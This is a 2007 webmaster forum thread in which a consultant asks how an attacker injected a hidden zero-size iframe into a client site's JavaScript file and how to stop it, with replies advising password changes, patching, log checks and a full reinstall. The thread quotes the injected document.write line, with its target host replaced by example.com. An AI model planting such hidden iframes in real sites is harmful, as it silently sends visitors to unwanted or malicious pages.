Site Hijacked via iframe addition. How was it done? How to prevent?

Forum Moderators: phranque

Message Too Old, No Replies

Site Hijacked via iframe addition. How was it done? How to prevent?

unni

5:50 pm on Feb 22, 2007 (gmt 0)

In my client's site somebody added a new line of code like this in a js file

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://example.com/index.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');

So when a visitor try of open their site, it was looking for many junk sites.

I removed the entry and now it is working fine...

But how they are getting in to the site..? what shd i do to prevent this?

[edited by: tedster at 7:28 pm (utc) on Feb. 24, 2007]
[edit reason] use example.com [/edit]

webdoctor

7:24 pm on Feb 24, 2007 (gmt 0)

Have you changed your site passwords?

Is your server up to date with security patches?

If you're on shared hosting, could other users of the server have accessed your site?

Have you checked any log files?

Do you know exactly when this happened - what were the timestamps on the modified files? Have you reported this unauthorised access to your host?

Could your own computer be compromised? Checked for trojans/rootkits recently?

[edited by: tedster at 7:27 pm (utc) on Feb. 24, 2007]

unni

3:36 pm on Feb 25, 2007 (gmt 0)

Hi,

Thanks a lot for the reply...

Actually the client has a tech team and they are maintaining it but they are technically not very sound so they contacted me to solve this problem...

Site is a windows dedicated server hosted with hostway.

I told them to change the password.. i think their local machines are not secure... virus scanners installed but they were not even aware about spywares... i told them to check with spywhere checker and install zonealam in every machines..

They removed the added entry on Friday but today again somebody added same kind of code in another js file. it seems like they still have the control. right?

webdoctor

4:31 pm on Feb 25, 2007 (gmt 0)

it seems like they still have the control. right?

If it was my server I'd pull the plug, reinstall from scratch, **PATCH** with all relevant updates (are they patching their server at the moment?), reinstall anti-virus, anti-spyware, **UPDATE** these, then restore data from backups.

You do have backups, right? :-)

unni

4:33 pm on Feb 26, 2007 (gmt 0)

Hi,

Thank you for the reply... yes you are right..

i have a vps and with the help of the hosting people i make everything up to date..

But their tech team is not capable of doing every thing.. they dont know many things.. I am working as a consultant to help them only in seo works..

i told them to change the root password, check for spyware and virus

They said they have full backup...

Matt Probert

6:43 pm on Feb 26, 2007 (gmt 0)

First they should look to their own staff. Viruses? Pah! Firewalls? Pah! What use are they when you have a pissed off member of staff or an intruder on the premises?

Talk to some real hackers and find out how *they* do it.

Matt